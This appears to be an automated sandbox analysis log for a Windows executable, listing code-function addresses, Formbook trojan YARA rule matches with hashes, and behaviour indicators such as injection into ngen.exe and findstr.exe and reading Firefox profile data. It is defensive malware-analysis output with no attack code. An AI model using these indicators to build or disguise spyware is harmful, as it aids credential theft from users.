Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658571930 0_2_00007FF658571930
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004017BF 4_2_004017BF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00402820 4_2_00402820
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004048A4 4_2_004048A4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0042D9C3 4_2_0042D9C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0041019A 4_2_0041019A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004101A3 4_2_004101A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00401230 4_2_00401230
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00403280 4_2_00403280
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00416A83 4_2_00416A83
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004103C3 4_2_004103C3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0040E443 4_2_0040E443
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00401C70 4_2_00401C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_004024FC 4_2_004024FC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_00402500 4_2_00402500
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05950591 4_2_05950591
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592D5B0 4_2_0592D5B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890535 4_2_05890535
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05947571 4_2_05947571
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593E4F6 4_2_0593E4F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594F43F 4_2_0594F43F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05942446 4_2_05942446
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05881460 4_2_05881460
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594F7B0 4_2_0594F7B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588C7C0 4_2_0588C7C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B4750 4_2_058B4750
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890770 4_2_05890770
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059416CC 4_2_059416CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AC6E0 4_2_058AC6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589B1B0 4_2_0589B1B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059501AA 4_2_059501AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059481CC 4_2_059481CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05880100 4_2_05880100
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592A118 4_2_0592A118
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058C516C 4_2_058C516C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587F172 4_2_0587F172
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0595B16B 4_2_0595B16B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058970C0 4_2_058970C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593F0CC 4_2_0593F0CC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594F0E0 4_2_0594F0E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059470E9 4_2_059470E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058D739A 4_2_058D739A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059503E6 4_2_059503E6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589E3F0 4_2_0589E3F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594132D 4_2_0594132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594A352 4_2_0594A352
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0587D34C 4_2_0587D34C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058952A0 4_2_058952A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AB2C0 4_2_058AB2C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_059312ED 4_2_059312ED
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05930274 4_2_05930274
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A8DBF 4_2_058A8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AFDC0 4_2_058AFDC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588ADE0 4_2_0588ADE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589AD00 4_2_0589AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05893D40 4_2_05893D40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05941D5A 4_2_05941D5A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05947D73 4_2_05947D73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05930CB5 4_2_05930CB5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594FCF2 4_2_0594FCF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05880CF2 4_2_05880CF2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890C00 4_2_05890C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05909C32 4_2_05909C32
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05891F92 4_2_05891F92
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594FFB1 4_2_0594FFB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05882FC8 4_2_05882FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589CFE0 4_2_0589CFE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594FF09 4_2_0594FF09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058D2F28 4_2_058D2F28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058B0F30 4_2_058B0F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05904F40 4_2_05904F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594CE93 4_2_0594CE93
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A2E90 4_2_058A2E90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05899EB0 4_2_05899EB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594EEDB 4_2_0594EEDB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594EE26 4_2_0594EE26
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05890E59 4_2_05890E59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058929A0 4_2_058929A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0595A9A6 4_2_0595A9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05899950 4_2_05899950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AB950 4_2_058AB950
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058A6962 4_2_058A6962
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058768B8 4_2_058768B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058938E0 4_2_058938E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058BE8F0 4_2_058BE8F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058FD800 4_2_058FD800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05892840 4_2_05892840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0589A840 4_2_0589A840
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058AFB80 4_2_058AFB80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05946BD7 4_2_05946BD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058CDBF9 4_2_058CDBF9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594AB40 4_2_0594AB40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594FB76 4_2_0594FB76
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0588EA80 4_2_0588EA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_058D5AA0 4_2_058D5AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0592DAAC 4_2_0592DAAC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0593DAC6 4_2_0593DAC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05947A46 4_2_05947A46
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_0594FA49 4_2_0594FA49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 4_2_05903A6C 4_2_05903A6C
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374A352 7_2_0374A352
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0367D34C 7_2_0367D34C
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374132D 7_2_0374132D
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_037503E6 7_2_037503E6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0369E3F0 7_2_0369E3F0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036D739A 7_2_036D739A
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03730274 7_2_03730274
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_037312ED 7_2_037312ED
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036AB2C0 7_2_036AB2C0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036952A0 7_2_036952A0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036C516C 7_2_036C516C
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0367F172 7_2_0367F172
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0375B16B 7_2_0375B16B
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03680100 7_2_03680100
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0372A118 7_2_0372A118
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_037481CC 7_2_037481CC
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0369B1B0 7_2_0369B1B0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_037501AA 7_2_037501AA
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374F0E0 7_2_0374F0E0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_037470E9 7_2_037470E9
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036970C0 7_2_036970C0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0373F0CC 7_2_0373F0CC
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03690770 7_2_03690770
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036B4750 7_2_036B4750
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0368C7C0 7_2_0368C7C0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374F7B0 7_2_0374F7B0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036AC6E0 7_2_036AC6E0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_037416CC 7_2_037416CC
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03747571 7_2_03747571
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03690535 7_2_03690535
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0372D5B0 7_2_0372D5B0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03750591 7_2_03750591
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03681460 7_2_03681460
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03742446 7_2_03742446
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374F43F 7_2_0374F43F
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0373E4F6 7_2_0373E4F6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374FB76 7_2_0374FB76
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374AB40 7_2_0374AB40
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036CDBF9 7_2_036CDBF9
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03746BD7 7_2_03746BD7
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036AFB80 7_2_036AFB80
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03703A6C 7_2_03703A6C
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03747A46 7_2_03747A46
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374FA49 7_2_0374FA49
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0373DAC6 7_2_0373DAC6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036D5AA0 7_2_036D5AA0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0372DAAC 7_2_0372DAAC
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0368EA80 7_2_0368EA80
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036A6962 7_2_036A6962
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03699950 7_2_03699950
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036AB950 7_2_036AB950
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036929A0 7_2_036929A0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0375A9A6 7_2_0375A9A6
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03692840 7_2_03692840
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0369A840 7_2_0369A840
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036938E0 7_2_036938E0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036BE8F0 7_2_036BE8F0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036768B8 7_2_036768B8
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03704F40 7_2_03704F40
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036B0F30 7_2_036B0F30
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374FF09 7_2_0374FF09
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0369CFE0 7_2_0369CFE0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03682FC8 7_2_03682FC8
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374FFB1 7_2_0374FFB1
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03691F92 7_2_03691F92
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03690E59 7_2_03690E59
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374EE26 7_2_0374EE26
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374EEDB 7_2_0374EEDB
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03699EB0 7_2_03699EB0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374CE93 7_2_0374CE93
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036A2E90 7_2_036A2E90
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03747D73 7_2_03747D73
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03693D40 7_2_03693D40
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03741D5A 7_2_03741D5A
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0369AD00 7_2_0369AD00
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0368ADE0 7_2_0368ADE0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036AFDC0 7_2_036AFDC0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_036A8DBF 7_2_036A8DBF
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03709C32 7_2_03709C32
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03690C00 7_2_03690C00
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0374FCF2 7_2_0374FCF2
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03680CF2 7_2_03680CF2
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_03730CB5 7_2_03730CB5
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E51A60 7_2_02E51A60
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E413A1 7_2_02E413A1
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E6A4C0 7_2_02E6A4C0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E53580 7_2_02E53580
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E4CEC0 7_2_02E4CEC0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E4AF40 7_2_02E4AF40
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E4CCA0 7_2_02E4CCA0
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_02E4CC97 7_2_02E4CC97
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0349A39A 7_2_0349A39A
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0349C06C 7_2_0349C06C
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0349B0D8 7_2_0349B0D8
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0349BBB4 7_2_0349BBB4
Source: C:\Windows\SysWOW64\findstr.exe Code function: 7_2_0349BCD3 7_2_0349BCD3
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: String function: 00007FF65855D7A0 appears 64 times
Source: C:\Windows\SysWOW64\findstr.exe Code function: String function: 036C5130 appears 36 times
Source: C:\Windows\SysWOW64\findstr.exe Code function: String function: 0367B970 appears 266 times
Source: C:\Windows\SysWOW64\findstr.exe Code function: String function: 036FEA12 appears 84 times
Source: C:\Windows\SysWOW64\findstr.exe Code function: String function: 0370F290 appears 105 times
Source: C:\Windows\SysWOW64\findstr.exe Code function: String function: 036D7E54 appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: String function: 0587B970 appears 268 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: String function: 058D7E54 appears 89 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: String function: 058C5130 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: String function: 0590F290 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: String function: 058FEA12 appears 85 times
Source: GJRX21GBj3.exe Binary or memory string: OriginalFilename vs GJRX21GBj3.exe
Source: GJRX21GBj3.exe, 00000000.00000000.2067604251.00007FF658727000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenameNegativePercentFormatWriteArray.dll` vs GJRX21GBj3.exe
Source: GJRX21GBj3.exe, 00000000.00000002.2078597874.0000029B99C00000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenameNegativePercentFormatWriteArray.dll` vs GJRX21GBj3.exe
Source: GJRX21GBj3.exe Binary or memory string: OriginalFilenameNegativePercentFormatWriteArray.dll` vs GJRX21GBj3.exe
Source: 4.2.ngen.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 4.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2294296870.0000000005BA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3924270486.0000000003150000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000008.00000002.3925169217.0000000002C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000007.00000002.3924150933.00000000030D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000006.00000002.3925057114.0000000002AF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.2294356055.0000000005CE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: GJRX21GBj3.exe Static PE information: Section: .rsrc ZLIB complexity 0.9966439773787313
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@10/1@12/8
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Code function: 0_2_00007FF658562B30 LookupPrivilegeValueW,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,GetLastError,CloseHandle,GetLargePageMinimum,VirtualAlloc,GetCurrentProcess,VirtualAllocExNuma, 0_2_00007FF658562B30
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6848:120:WilError_03
Source: C:\Windows\SysWOW64\findstr.exe File created: C:\Users\user\AppData\Local\Temp\H0840I45
Source: GJRX21GBj3.exe Static file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\GJRX21GBj3.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
